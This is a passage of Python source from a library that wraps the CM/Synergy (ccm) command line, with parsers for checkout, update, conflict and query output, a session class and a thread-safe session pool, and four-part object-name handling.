            #(?P<name>.+)-(?P<version>.+?)(:(?P<type>\S+):(?P<instance>\S+))?
            if mresult != None:
                #self.__project.name + "-" + mo.groupdict()['version'] + ":" + self.__project.type + ":" + self.__project.instance
                self.__result_project = self._session.create(mresult.group(1))
                _logger.debug("ProjectCheckoutResult: project: '%s'" % self.__result_project)
                return
    def __get_result_project(self):
        """ return the checked out project. """
        return self.__result_project
    project = property(__get_result_project)
class ProjectPurposeResult(Result):
    """ Parses purpose query output into a dict keyed by purpose name,
    each value holding 'member_status' and 'status'. """
    def __init__(self, session):
        Result.__init__(self, session)
    def _setoutput(self, output):
        purposes = {}
        line_re = re.compile(r"(?P<purpose>.+?)\s+(?P<member_status>\w+)\s+(?P<status>\w+)$")
        header_re = re.compile(r'^\s+Purpose\s+Member$', re.I)
        for line in output.splitlines():
            found = line_re.match(line)
            if found is None:
                continue
            fields = found.groupdict()
            # Skip the column-header line of the table.
            if header_re.match(fields['purpose']) is not None:
                continue
            purposes[fields['purpose'].strip()] = {
                'member_status': fields['member_status'].strip(),
                'status': fields['status'].strip(),
            }
        self._output = purposes
class ConflictsResult(Result):
    """ Parses 'ccm conflicts' output into a dict mapping each Project to a
    list of conflict records ({'object', 'task', 'comment'} or
    {'task', 'comment'}). """
    def __init__(self, session):
        Result.__init__(self, session)
    def _setoutput(self, output):
        self._output = {}
        project = None
        for line in output.splitlines():
            # A "Project: <name>" header starts the conflict list for that project.
            mresult = re.match(r"Project:\s*(.+)\s*$", line)
            if mresult != None:
                project = self._session.create(mresult.group(1))
                self._output[project] = []
            # object + task + comment line
            mresult = re.match(r"^(.*)\s+(\w+#\d+)\s+(.+)$", line)
            if mresult != None and project != None:
                self._output[project].append({'object': self._session.create(mresult.group(1)),
                                              'task': self._session.create("Task %s" % mresult.group(2)),
                                              'comment': mresult.group(3)})
            # task-only conflict line (no object column)
            # NOTE(review): a line can in principle match both patterns and be
            # appended twice if the comment itself contains "word#digits" -
            # verify against real ccm output.
            mresult = re.match(r"^(\w+#\d+)\s+(.+)$", line)
            if mresult != None and project != None:
                self._output[project].append({'task': self._session.create("Task %s" % mresult.group(1)),
                                              'comment': mresult.group(2)})
class FinduseResult(Result):
    """ Parses finduse query output for one object into a list of
    {'path', 'project'} dicts (one per location using the object). """
    def __init__(self, ccm_object):
        Result.__init__(self, ccm_object.session)
        self.__object = ccm_object
    def _setoutput(self, output):
        self._output = []
        for line in output.splitlines():
            _logger.debug("FinduseResult: ---->%s<----" % line)
            _logger.debug("FinduseResult: ---->%s-%s<----" % (self.__object.name, self.__object.version))

            # Sample line: MCNaviscroll\NaviAnim-username7@MCNaviscroll-username6
            # i.e. <path>\<name>-<version>@<project>; name/version come from
            # the queried object itself.
            mresult = re.match(r"^\s*(?P<path>.+)[\\/]%s-%s@(?P<project>.+)" % (self.__object.name, self.__object.version), line, re.I)
            if mresult != None:
                data = mresult.groupdict()
                _logger.debug("FinduseResult: %s" % data)
                project = self._session.create(data['project'])
                self._output.append({'path' : data['path'], 'project' : project})
class UpdateTemplateInformation(Result):
    """ Parse update template information output into a dict.

    Recognized fields: baseline_selection_mode, prep_allowed (bool),
    version_matching, release_purpose, default (bool),
    modifiable_in_database, in_use_for_release (bool). Lines that do not
    match a known "<Label>: <value>" pair are ignored.
    """
    def __init__(self, session):
        Result.__init__(self, session)
    def _setoutput(self, output):
        parsed = {}
        # Label -> (output key, value converter). "!= 'No'" turns the
        # Yes/No answers into booleans; other values are kept as text.
        extractors = {
            "Baseline Selection Mode": ('baseline_selection_mode', lambda v: v),
            "Prep Allowed": ('prep_allowed', lambda v: v != "No"),
            "Versions Matching": ('version_matching', lambda v: v),
            "Release Purposes": ('release_purpose', lambda v: v),
            "Use by Default": ('default', lambda v: v != "No"),
            "Modifiable in Database": ('modifiable_in_database', lambda v: v.strip()),
            "In Use For Release": ('in_use_for_release', lambda v: v != "No"),
        }
        for line in output.splitlines():
            rmo = re.match(r"^\s*(.+):\s*(.*)\s*", line)
            if rmo is None:
                continue
            entry = extractors.get(rmo.group(1))
            if entry is not None:
                key, convert = entry
                parsed[key] = convert(rmo.group(2))
        self._output = parsed
class UpdatePropertiesRefreshResult(Result):
    """ Parse update template refresh output: collects the Task objects
    listed under "Added the following tasks" / "Removed the following tasks"
    into {'added': [...], 'removed': [...]}. """
    def __init__(self, session):
        Result.__init__(self, session)
    def _setoutput(self, output):
        tasks = {'added': [], 'removed': []}
        section_markers = [('added', re.compile(r"^Added the following tasks")),
                           ('removed', re.compile(r"^Removed the following tasks"))]
        task_re = re.compile(r"^\s+(Task \S+#\d+)")
        current = None
        for line in output.splitlines():
            for section_name, marker in section_markers:
                if marker.match(line) is not None:
                    # Section header: subsequent task lines belong here.
                    current = section_name
                    break
            else:
                if current is not None:
                    found = task_re.match(line)
                    if found is not None:
                        tasks[current].append(self._session.create(found.group(1)))
        self._output = tasks
class UpdateResultSimple(Result):
    """ Parse update output, tracking only overall success.

    The raw text is kept as the output; 'successful' turns False when any
    line starts with "Update failed".
    """
    def __init__(self, session):
        Result.__init__(self, session)
        self._success = True
    def _setoutput(self, output):
        self._output = output
        failure_re = re.compile(r"(Update failed)")
        if any(failure_re.match(line) for line in output.splitlines()):
            self._success = False
    @property
    def successful(self):
        """ True unless an "Update failed" line was seen. """
        return self._success
class UpdateResult(UpdateResultSimple):
    """ Parse update output into {'tasks', 'modifications', 'errors',
    'warnings'} lists; also tracks overall success via the base class. """
    def __init__(self, session):
        UpdateResultSimple.__init__(self, session)
    def _setoutput(self, output):
        self._output = {"tasks":[], "modifications": [], "errors": [], "warnings": []}
        # One regex per known line shape of "ccm update" output; the first
        # match wins for each line (hence the continue after every hit).
        match_object_update = re.compile(r"^\s+'(.*)'\s+replaces\s+'(.*)'\s+under\s+'(.*)'\.")
        match_object_new = re.compile(r"^\s+(?:Subproject\s+)?'(.*)'\s+is now bound under\s+'(.*)'\.")
        match_task_new = re.compile(r"^\s+(Task \S+#\d+)")
        match_no_candidate = re.compile(r"^\s+(.+) in project (.+) had no candidates")
        match_update_failure = re.compile(r"^\s+Failed to use selected object\s+(.+)\s+under directory\s+(.+)\s+in project\s+(.+)\s+:\s+(.+)")
        match_warning = re.compile(r"^Warning:(.*)")
        match_failed = re.compile(r"(Update failed)")
        # TODO: cleanup the parsing to do that in a more efficient way.
        for line in output.splitlines():
            _logger.info(line)
            # "'new' replaces 'old' under 'project'." -> modification record
            res = match_object_update.match(line)
            if res != None:
                self._output['modifications'].append({ "new": self._session.create(res.group(1)),
                                                      "old": self._session.create(res.group(2)),
                                                      "project": self._session.create(res.group(3))
                                                      })
                continue
            # "'new' is now bound under 'project'." -> addition (no old object)
            res = match_object_new.match(line)
            if res != None:
                self._output['modifications'].append({ "new": self._session.create(res.group(1)),
                                                      "old": None,
                                                      "project": self._session.create(res.group(2))
                                                      })
                continue
            res = match_task_new.match(line)
            if res != None:
                self._output['tasks'].append(self._session.create(res.group(1)))
                continue
            res = match_no_candidate.match(line)
            if res != None:
                self._output['errors'].append({'family': res.group(1),
                                               'project': self._session.create(res.group(2)),
                                               'comment': "had no candidates",
                                               'line': line,
                                               })
                continue
            res = match_update_failure.match(line)
            if res != None:
                self._output['errors'].append({'family': res.group(1),
                                               'dir': self._session.create(res.group(2)),
                                               'project': self._session.create(res.group(3)),
                                               'comment': res.group(4),
                                               'line': line,
                                               })
                continue
            res = match_warning.match(line)
            if res != None:
                self._output['warnings'].append({'family': None,
                                                 'project': None,
                                                 'comment': res.group(1),
                                                 'line': line,
                                                 })
                continue
            # "Update failed" flips the base-class success flag as well.
            res = match_failed.match(line)
            if res != None:
                self._success = False
                self._output['errors'].append({'Serious': res.group(1),
                                               })
                continue
class WorkAreaInfoResult(Result):
    """ Parse work area info output. """
    def __init__(self, session):
        Result.__init__(self, session)
    def _setoutput(self, output):
        """ Returns a dict with the following fields:
            * project: a ccm.Project instance
            * maintain: a boolean
            * copies: a boolean
            * relative: a boolean
            * time: a boolean
            * translate: a boolean
            * modify: a boolean
            * path: a string representing the project wa path

        Output stays None when no line matches the expected table format.
        """
        self._output = None
        for line in output.splitlines():
            # "wa -show" table row: project, six TRUE/FALSE flags, then the
            # quoted work area path.
            mresult = re.match(r"(?P<project>.*)\s+(?P<maintain>TRUE|FALSE)\s+(?P<copies>TRUE|FALSE)\s+(?P<relative>TRUE|FALSE)\s+(?P<time>TRUE|FALSE)\s+(?P<translate>TRUE|FALSE)\s+(?P<modify>TRUE|FALSE)\s+'(?P<path>.*)'", line)
            if mresult != None:
                data = mresult.groupdict()
                self._output = {'project': self._session.create(data['project']),
                                'maintain' : data['maintain'] == "TRUE",
                                'copies' : data['copies'] == "TRUE",
                                'relative' : data['relative'] == "TRUE",
                                'time' : data['time'] == "TRUE",
                                'translate' : data['translate'] == "TRUE",
                                'modify' : data['modify'] == "TRUE",
                                'path' : data['path']
                                }
                return
class CreateNewTaskResult(Result):
    """ Parses "task -create" output; the result is the new Task object,
    or None when no creation line is found. """
    def __init__(self, session):
        Result.__init__(self, session)
    def _setoutput(self, output):
        self._output = None
        created_re = re.compile(r"Task\s+(?P<task>\S+\#\d+)\s+created\.")
        for line in output.splitlines():
            found = created_re.match(line)
            if found is not None:
                self._output = self._session.create("Task " + found.groupdict()['task'])
                return
class AttributeNameListResult(Result):
    """ Parses "attr -show" style output into a list of attribute names.

    Lines without a leading word yield None entries (preserved, not
    filtered), matching the historical behaviour of this parser.
    """
    def __init__(self, session):
        Result.__init__(self, session)
    def _setoutput(self, obj):
        names = []
        name_re = re.compile(r"^\s*(?P<name>\w+)")
        for line in obj.strip().splitlines():
            found = name_re.match(line.strip())
            names.append(found.groupdict()['name'] if found is not None else None)
        self._output = names
class ObjectListResult(Result):
    """ Parses an object list Synergy output into session objects,
    skipping blank lines. An empty list is produced when the output
    starts with a no-result marker. """
    def __init__(self, session):
        Result.__init__(self, session)
    def _setoutput(self, obj):
        self._output = []
        # "None", "No tasks" or "Warning" at the start of any line means
        # there is nothing to parse.
        if re.match(r"^None|^No tasks|^Warning", obj, re.M) is not None:
            return
        for line in obj.strip().splitlines():
            text = line.strip()
            if text != "":
                self._output.append(self._session.create(text))
class DataMapperListResult(Result):
    """ Parses an object list Synergy output produced with a custom
    -format string (see format()) into a list of dicts keyed by the
    configured keywords, with values converted per the datamodel. """
    # Converters from matched text to typed values; 'ccmobject' needs the
    # session (first argument) to instantiate the wrapper object.
    dataconv = {'ccmobject': lambda x, y: x.create(y),
                'string': lambda x, y: y,
                'int': lambda x, y: int(y),
                'boolean': lambda x, y: (y.lower() == "true")}

    def __init__(self, session, separator, keywords, datamodel):
        # separator: delimiter token emitted around each field in format();
        # keywords: field names; datamodel: one dataconv key per keyword.
        self._separator = separator
        self._keywords = keywords
        self._datamodel = datamodel
        Result.__init__(self, session)

    def format(self):
        """ Returns the -format string matching regex() below. """
        formatted_keywords = ["%s%s%s%%%s" % (self._separator, x, self._separator, x) for x in self._keywords]
        return "".join(formatted_keywords) + self._separator

    def regex(self):
        """ Returns the compiled regex matching one record emitted by format(). """
        regex_keywords = [r'%s%s%s(.*?)' % (self._separator, x, self._separator) for x in self._keywords]
        regex = r''.join(regex_keywords)
        regex = r"%s%s\s*\n" % (regex, self._separator)
        return re.compile(regex, re.MULTILINE | re.I | re.DOTALL | re.VERBOSE | re.U)

    def _setoutput(self, obj):
        self._output = []
        regex = self.regex()
        _logger.debug("Regex %s" % (regex.pattern))
        for match in regex.finditer(obj):
            _logger.debug("Found: %s" % (match))
            output_line = {}
            # Capture groups are 1-based and ordered like the keywords.
            # (Fix: replaced the manual range(len(...)) loop that carried a
            # dead "i += 1" statement with enumerate.)
            for i, model in enumerate(self._datamodel):
                value = match.group(i + 1)
                _logger.debug("Found %d: %s" % (i, value))
                output_line[self._keywords[i]] = self.dataconv[model](self._session, value)
            self._output.append(output_line)
class FolderCopyResult(Result):
    """ Parses a folder copy result: output becomes the session object built
    from the matching line, or None. """
    def __init__(self, session):
        Result.__init__(self, session)
    def _setoutput(self, output):
        self._output = None
        for line in output.splitlines():
            # NOTE(review): re.match anchors at the start of the line, so this
            # only hits lines that BEGIN with "appended to" - confirm that is
            # the intended shape of the ccm output (re.search would match the
            # phrase anywhere).
            mo = re.match(r"appended to", line)
            if mo != None:
                self._output = self._session.create(line)
                return
# Rule tables for log_result() below: each entry is [regex, logging level].
# A log line gets the level of the FIRST rule whose regex matches its start;
# unmatched lines are logged at INFO.
CHECKOUT_LOG_RULES = [[r'^Derive failed for', logging.ERROR],
                     [r'^Serious:', logging.ERROR],
                     [r'^Warning: .* failed.', logging.ERROR],
                     [r'^Invalid work area', logging.ERROR],
                     [r'^WARNING:', logging.WARNING],
                     [r'^Warning:', logging.WARNING],]
UPDATE_LOG_RULES = [[r'^Update failed.', logging.ERROR],
                     [r'^Serious:', logging.ERROR],
                     [r'^\s+Failed to', logging.ERROR],
                     [r'^\d+ failures to', logging.ERROR],
                     [r"^Warning: This work area '.+' cannot be reused", logging.ERROR],
                     [r'^Rebind of .* failed', logging.ERROR],
                     [r'^Warning: .* failed.', logging.ERROR],
                     [r'^Skipping \'.*\'\. You do not have permission to modify this project.', logging.ERROR],
                     [r'^Work area conflict exists for file', logging.ERROR],
                     [r'^Warning: No candidates found for directory entry', logging.ERROR],
                     [r'^WARNING:', logging.WARNING],
                     [r'^Warning:', logging.WARNING],]
CONFLICTS_LOG_RULES = [[r'^\w+#\d+\s+Implicit', logging.WARNING],
                       [r'^(.*)\s+(\w+#\d+)\s+(.+)', logging.WARNING],
                       [r'.*Explicitly specified but not included', logging.WARNING],]
SYNC_LOG_RULES = [[r'^\s+0\s+Conflict\(s\) for project', logging.INFO],
                  [r'^\s+\d+\s+Conflict\(s\) for project', logging.ERROR],
                  [r'^Project \'.*\' does not maintain a workarea.', logging.ERROR],
                  [r'^Work area conflict exists for file', logging.ERROR],
                  [r'^Warning: Conflicts detected during synchronization. Check your logs.', logging.ERROR],
                  [r'^Warning:', logging.WARNING],]
def log_result(result, rules, logger=None):
    """ Logs every line of a result through the given logger.

    Rules is a list of [regex, level] pairs: the first regex matching the
    start of a line decides its log level; unmatched lines go out at INFO.
    When logger is None the module logger is used.
    """
    if logger is None:
        logger = _logger
    compiled = []
    if rules is not None:
        compiled = [(re.compile(rule[0]), rule[1]) for rule in rules]
    for line in str(result).splitlines():
        for matcher, level in compiled:
            if matcher.match(line) is not None:
                logger.log(level, line)
                break
        else:
            logger.info(line)
class AbstractSession(object):
"""An abstract Synergy session.
Must be overridden to implement either a single session or
multiple session handling.
"""
def __init__(self, username, engine, dbpath, ccm_addr):
self.username = username
self.engine = engine
self.dbpath = dbpath
self._session_addr = ccm_addr
# internal object list
self.__ccm_objects = {}
def addr(self):
""" Returns the Synergy session id."""
return self._session_addr
def database(self):
_logger.debug("AbstractSession: database")
self.__find_dbpath()
_logger.debug("AbstractSession: database: %s" % self.dbpath)
return os.path.basename(self.dbpath)
def __find_dbpath(self):
""" retrieve the database path from current session status. """
_logger.debug("AbstractSession: __find_dbpath")
if (self.dbpath != None):
return
result = self.execute("status")
for match in re.finditer(r'(?:(?:Graphical)|(?:Command)) Interface\s+@\s+(?P<ccmaddr>\w+:\d+(?:\:\d+\.\d+\.\d+\.\d+)+)(?P<current_session>\s+\(current\s+session\))?\s*\nDatabase:\s*(?P<dbpath>\S+)', result.output, re.M | re.I):
d = match.groupdict()
if (d['current_session'] != None):
_logger.debug("AbstractSession: __find_dbpath: Found dbpath: %s" % d['dbpath'])
self.dbpath = d['dbpath']
assert self.dbpath != None
def execute(self, _, result=None):
""" Abstract function that should implement the execution of ccm command
line call.
"""
return result
def create(self, fpn):
""" Object factory, this is the toolkit entry point to create objects from
four part names. Objects are stored into a dictionary, so you have
only one wrapper per synergy object.
"""
result = re.search(r"^(?P<project>.+)-(?P<version>[^:]+?)$", fpn)
if result != None:
matches = result.groupdict()
fpn = "%s-%s:project:%s#1" % (matches['project'], matches['version'], self.database())
_logger.debug("session.create('%s')" % fpn)
ofpn = FourPartName(fpn)
if not self.__ccm_objects.has_key(str(fpn)):
obj = None
if ofpn.type == 'project':
obj = Project(self, fpn)
elif ofpn.type == 'dir':
obj = Dir(self, fpn)
elif ofpn.type == 'task':
obj = Task(self, fpn)
elif ofpn.type == 'folder':
obj = Folder(self, fpn)
elif ofpn.type == 'releasedef':
obj = Releasedef(self, fpn)
else:
obj = File(self, fpn)
self.__ccm_objects[str(fpn)] = obj
return self.__ccm_objects[str(fpn)]
def get_workarea_info(self, dir_):
""" Return a dictionary containing workarea info from directory dir.
"""
if (not os.path.exists(dir_)):
raise CCMException("Error retrieving work_area info for the directory '%s' (doesn't exists)" % dir_)
path = os.path.abspath(os.path.curdir)
path_ccmwaid = os.path.join(dir_,"_ccmwaid.inf");
if(not os.path.exists(path_ccmwaid)):
raise CCMException("No work area in '%s'" % dir_)
os.chdir(dir_)
result = self.execute("wa -show", WorkAreaInfoResult(self))
os.chdir(path)
if result.output == None:
raise CCMException("Error retrieving work_area info for the directory '%s'" % dir_)
return result.output
def _get_role(self):
result = self.execute("set role")
return result.output.strip()
def _set_role_internal(self, role):
""" method to be override by child class else property accession is not working properly. """
if role == None or len(role) == 0:
raise CCMException("You must provide a role.")
result = self.execute("set role %s" % role)
if re.match(r'^Warning:', result.output, re.M) != None:
raise CCMException("Error switching to role %s: %s" %(role, result.output.strip()))
def _set_role(self, role):
self._set_role_internal(role)
role = property(fget=_get_role, fset=_set_role)
def _get_home(self):
result = self.execute("set Home")
return result.output.strip()
def _set_home(self, home):
if len(home) == 0 or home == None:
raise CCMException("You must provide a home.")
result = self.execute("set Home %s" % home)
if re.match(r'^Warning:', result.output, re.M) != None:
raise CCMException("Error switching to Home %s: %s" %(home, result.output.strip()))
home = property(_get_home, _set_home)
def close(self):
    """ No-op here; subclasses that own a live session override this. """
    pass
def __str__(self):
    """ Return '<session_addr>:<dbpath>'. """
    # __find_dbpath lazily resolves self.dbpath (name-mangled private
    # helper defined on the enclosing class, outside this view)
    self.__find_dbpath()
    return self._session_addr + ':' + self.dbpath
def __repr__(self):
    """ Same textual form as __str__. """
    return str(self)
def __del__(self):
    """ Close the session when the wrapper is garbage collected. """
    self.close()
def purposes(self, role=None):
    """ Return the available project purposes.

    :param role: optional role name used to restrict the listing.
    """
    args = ""
    if role is not None:
        args = "-role \"%s\"" % role
    result = self.execute("project_purpose -show %s" % args, ProjectPurposeResult(self))
    return result.output
class Session(AbstractSession):
    """A Synergy session.

    Wraps a single running 'ccm' session identified by its CCM_ADDR
    session address; all CLI calls are serialised through a lock.
    """
    def __init__(self, username, engine, dbpath, ccm_addr, close_on_exit=True):
        AbstractSession.__init__(self, username, engine, dbpath, ccm_addr)
        # serialises CLI invocations: one 'ccm' subprocess at a time
        self._execute_lock = threading.Lock()
        self.close_on_exit = close_on_exit

    @staticmethod
    def start(username, password, engine, dbpath, timeout=300):
        """ Start a new Synergy session and return a Session object.

        Raises CCMException on missing credentials or missing 'ccm'
        binary, and a plain Exception when session creation fails.
        """
        if username is None:
            raise CCMException('username is not valid')
        if password is None:
            raise CCMException('password is not valid')
        if CCM_BIN is None:
            raise CCMException("Could not find CM/Synergy executable in the path.")
        command = "%s start -m -q -nogui -n %s -pw %s -h %s -d %s" % \
            (CCM_BIN, username, password, engine, dbpath)
        # never log the clear-text password
        _logger.debug('Starting new session:' + command.replace(password, "***"))
        (result, status) = _execute(command, timeout=timeout)
        if status != 0:
            raise Exception("Error creating a session: result:\n%s\nCommand: %s" % (result, command.replace(password, "***")))
        session_addr = result.strip()
        _logger.debug(session_addr)
        # a valid session address looks like 'name:port:a.b.c.d[:a.b.c.d]'
        if not re.match(r'[a-zA-Z0-9_-]+:\d+:\d+\.\d+\.\d+\.\d+(:\d+\.\d+\.\d+\.\d+)?', session_addr):
            raise Exception("Error creating a session: result:\n%s" % result)
        return Session(username, engine, dbpath, session_addr)

    def execute(self, cmdline, result=None):
        """ Executes a Synergy CLI operation.

        :param cmdline: the ccm sub-command line to run.
        :param result: optional Result-like object used to parse output.
        """
        if self._session_addr is None:
            raise CCMException("No Synergy session running")
        if CCM_BIN is None:
            raise CCMException("Could not find CM/Synergy executable in the path.")
        self._execute_lock.acquire()
        output = ""
        error = ""
        try:
            if result is None:
                result = Result(self)
            # CCM_ADDR selects the session for the spawned 'ccm' process
            if os.sep == '\\':
                command = "set CCM_ADDR=" + self._session_addr + " && " + CCM_BIN + " %s" % cmdline
            else:
                command = "export CCM_ADDR=" + self._session_addr + " && " + CCM_BIN + " %s" % cmdline
            _logger.debug('Execute > ' + command)
            if hasattr(result, 'error'):
                process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
                # bugfix: communicate() drains both pipes concurrently —
                # sequential .read() calls on two PIPEs can deadlock when
                # a pipe buffer fills — and waits for exit, so returncode
                # is an actual status instead of always None
                (output, error) = process.communicate()
                result.status = process.returncode
            else:
                process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
                (output, _) = process.communicate()
                result.status = process.returncode
        finally:
            self._execute_lock.release()
        result.output = output.strip()
        if hasattr(result, 'error'):
            result.error = error.strip()
        return result

    def close(self):
        """ Closes this Synergy session if it was not previously running anyway. """
        _logger.debug("Closing session %s" % self._session_addr)
        if self._session_addr is not None and self.close_on_exit:
            _logger.debug("Closing session %s" % self._session_addr)
            self._execute_lock.acquire()
            if os.sep == '\\':
                command = "set CCM_ADDR=" + self._session_addr + " && " + CCM_BIN + " stop"
            else:
                command = "export CCM_ADDR=" + self._session_addr + " && " + CCM_BIN + " stop"
            _logger.debug('Execute > ' + command)
            pipe = os.popen(command)
            pipe.close()
            # mark the session closed so later execute() calls fail fast
            self._session_addr = None
            self._execute_lock.release()
        elif self._session_addr is not None and not self.close_on_exit:
            _logger.debug("Keeping session %s alive." % self._session_addr)
class SessionPool(AbstractSession):
    """ Session that transparently handled several subsession, to easily enable
    multithreaded application.

    A Condition object guards all pool state; _lock_pool freezes the pool
    while it is being resized or closed.
    """
    def __init__(self, username, password, engine, dbpath, database=None, size=4, opener=None):
        AbstractSession.__init__(self, username, engine, dbpath, None)
        self._opener = opener
        if self._opener is None:
            self._opener = open_session
        self._free_sessions = []
        self._used_sessions = []
        # maps a thread to its currently-allocated session (recursion support)
        self._thread_sessions = {}
        self._pool_lock = threading.Condition()
        self._lock_pool = False
        self.__password = password
        self.__database = database
        # goes through the 'size' property setter, opening the subsessions
        self.size = size

    def _set_size(self, size):
        """ Set the pool size, opening or closing subsessions as needed. """
        self._pool_lock.acquire()
        poolsize = len(self._free_sessions) + len(self._used_sessions)
        if poolsize > size:
            to_be_remove = poolsize - size
            # freeze the pool and wait for enough sessions to come back
            self._lock_pool = True
            while len(self._free_sessions) < to_be_remove:
                self._pool_lock.wait()
            for _ in range(to_be_remove):
                self._free_sessions.pop().close()
            self._lock_pool = False
        else:
            for _ in range(size - poolsize):
                self._free_sessions.append(self._opener(self.username, self.__password, self.engine, self.dbpath, self.__database, False))
        self._pool_lock.release()

    def _get_size(self):
        """ Return the total number of subsessions (free + used). """
        self._pool_lock.acquire()
        poolsize = len(self._free_sessions) + len(self._used_sessions)
        self._pool_lock.release()
        return poolsize

    size = property(_get_size, _set_size)

    def execute(self, cmdline, result=None):
        """ Executing a ccm command on a free session. """
        _logger.debug("SessionPool:execute: %s %s" % (cmdline, type(result)))
        # waiting for a free session
        self._pool_lock.acquire()
        # check for recursion, in that case reallocate the same session,
        if threading.currentThread() in self._thread_sessions:
            _logger.debug("Same thread, reusing allocation session.")
            # release the pool and reuse associated session
            self._pool_lock.release()
            return self._thread_sessions[threading.currentThread()].execute(cmdline, result)
        while len(self._free_sessions) == 0 or self._lock_pool:
            self._pool_lock.wait()
        session = self._free_sessions.pop(0)
        self._used_sessions.append(session)
        self._thread_sessions[threading.currentThread()] = session
        self._pool_lock.release()
        # running command
        try:
            result = session.execute(cmdline, result)
        finally:
            # we can now release the session - anyway
            self._pool_lock.acquire()
            self._thread_sessions.pop(threading.currentThread())
            self._used_sessions.remove(session)
            self._free_sessions.append(session)
            self._pool_lock.notifyAll()
            self._pool_lock.release()
        return result

    def close(self):
        """ Closing all subsessions. """
        _logger.debug("Closing session pool sub-sessions")
        self._lock_pool = True
        self._pool_lock.acquire()
        while len(self._used_sessions) > 0:
            _logger.debug("Waiting to free used sessions.")
            _logger.debug("Waiting to free used sessions. %s %s" % (len(self._used_sessions), len(self._free_sessions)))
            _logger.debug(self._used_sessions)
            _logger.debug(self._free_sessions)
            self._pool_lock.wait()
        _logger.debug("Closing all free session from the pool.")
        while len(self._free_sessions) > 0:
            self._free_sessions.pop().close()
        self._lock_pool = False
        self._pool_lock.notifyAll()
        self._pool_lock.release()

    def _set_role_internal(self, role):
        """ Set role on all subsessions. """
        self._lock_pool = True
        self._pool_lock.acquire()
        while len(self._used_sessions) != 0:
            self._pool_lock.wait()
        try:
            for session in self._free_sessions:
                # bugfix: the original did 'session.role = session._set_role(role)',
                # which re-invoked the role property setter with the None return
                # value and raised "You must provide a role."; calling the setter
                # once is both necessary and sufficient
                session._set_role(role)
        finally:
            self._lock_pool = False
            self._pool_lock.notifyAll()
            self._pool_lock.release()
class Query(object):
    """ Wrapper around a Synergy query.

    Takes a query string plus the attributes wanted as output, which get
    translated using the model configuration, e.g.

        Query(session, "type='task' and release='test/next'",
              ['objectname', 'task_synopsis'], ['ccmobject', 'string'])

    returns a list of dicts:
        [{'objectname': Task(xxx), 'task_synopsis': 'xxx'}, ...]
    """

    def __init__(self, session, query, keywords, model, cmd="query"):
        """ Initialize a Synergy query."""
        self._session = session
        self._query = query
        self._keywords = keywords
        self._model = model
        self._cmd = cmd

    def execute(self):
        """ Executing the query on the database. """
        mapper = DataMapperListResult(self._session, '@@@', self._keywords, self._model)
        command = "%s %s -u -f \"%s\"" % (self._cmd, self._query, mapper.format())
        return self._session.execute(command, mapper)
class InvalidFourPartNameException(CCMException):
    """ Badly formed Synergy four-part name. """
    def __init__(self, fpn = ""):
        # the offending string is carried as the exception message
        CCMException.__init__(self, fpn)
class FourPartName(object):
    """ This class handle four part name parsing and validation.

    A four-part name is either 'name-version:type:instance' or, for
    release definitions, 'name:version:releasedef:instance'.
    """
    def __init__(self, ifpn):
        """ Create a FourPartName object based on a ifpn string.
        The string have to match the following patterns:
        - name-version:type:instance
        - name:version:releasedef:instance
        - Task database#id
        - Folder database#id
        Anything else is considered as old release string format.

        Raises InvalidFourPartNameException when the string cannot be
        normalised into either four-part form.
        """
        _logger.debug("FourPartName: '%s'", ifpn)
        # normalise the various CLI output spellings into a canonical form
        fpn = FourPartName.convert(ifpn)
        # general form: name-version:type:instance
        result = re.search(r"^(?P<name>.+)-(?P<version>.+?):(?P<type>\S+):(?P<instance>\S+)$", fpn)
        if result == None:
            # fallback: releasedef objects separate name/version with ':'
            result = re.search(r"^(?P<name>.+):(?P<version>.+?):(?P<type>releasedef):(?P<instance>\S+)$", fpn)
            if result == None:
                raise InvalidFourPartNameException(fpn)
        # set all attributes
        self._name = result.groupdict()['name']
        self._version = result.groupdict()['version']
        self._type = result.groupdict()['type']
        self._instance = result.groupdict()['instance']

    def __getname(self):
        """ Returns the name of the object. """
        return self._name

    def __getversion(self):
        """ Returns the version of the object. """
        return self._version

    def __gettype(self):
        """ Returns the type of the object. """
        return self._type

    def __getinstance(self):
        """ Returns the instance of the object. """
        return self._instance

    def __getobjectname(self):
        """ Returns the objectname of the object. """
        # releasedef objects use ':' between name and version, others '-'
        if (self.type == 'releasedef'):
            return "%s:%s:%s:%s" % (self.name, self.version, self.type, self.instance)
        return "%s-%s:%s:%s" % (self.name, self.version, self.type, self.instance)

    def __str__(self):
        """ Returns the string representation of the object. """
        return self.objectname

    def __repr__(self):
        """ Returns the string representation of the python object. """
        if (self.type == 'releasedef'):
            return "<%s:%s:%s:%s>" % (self.name, self.version, self.type, self.instance)
        return "<%s-%s:%s:%s>" % (self.name, self.version, self.type, self.instance)

    def is_same_family(self, ccmobject):
        """ Returns True if the ccmobject is part of the same family (=same name, type and instance) as self. """
        assert isinstance(ccmobject, FourPartName)
        return (self.name == ccmobject.name and self.type == ccmobject.type and self.instance == ccmobject.instance)

    def __getfamily(self):
        # family key: everything except the version
        return "%s:%s:%s" % (self.name, self.type, self.instance)

    def __eq__(self, ccmobject):
        """ Returns True if object four parts name are identical. """
        if ccmobject == None:
            return False
        # NOTE(review): comparison against a non-FourPartName (other than
        # None) raises AssertionError rather than returning NotImplemented
        assert isinstance(ccmobject, FourPartName)
        return (self.name == ccmobject.name and self.version == ccmobject.version and self.type == ccmobject.type and self.instance == ccmobject.instance)

    def __ne__(self, ccmobject):
        """ Returns True if object four parts name are different. """
        if ccmobject == None:
            return True
        assert isinstance(ccmobject, FourPartName)
        return (self.name != ccmobject.name or self.version != ccmobject.version or self.type != ccmobject.type or self.instance != ccmobject.instance)

    @staticmethod
    def is_valid(fpn):
        """ Check if a given string represents a valid four part name.
        """
        # NOTE(review): the '|' alternation binds loosely, so '^' anchors
        # only the first branch and '$' only the second — presumably
        # harmless in practice, but worth confirming before tightening
        return (re.match(r"^(.+)-(.+?):(\S+):(\S+)|(.+):(.+?):releasedef:(\S+)$", fpn) != None)

    @staticmethod
    def convert(fpn):
        """ Update a CCM output string to a valid four part name. This is due to the inconsistent
        output of CM/Synergy CLI.

        Handles, in order: already-valid names, 'Task db#id' / 'Folder db#id'
        forms, 'project/version' release strings, and bare single-token
        release names. Raises InvalidFourPartNameException otherwise.
        """
        fpn = fpn.strip()
        if FourPartName.is_valid(fpn):
            return fpn
        # 'Task db#id' / 'Folder db#id' CLI shorthand
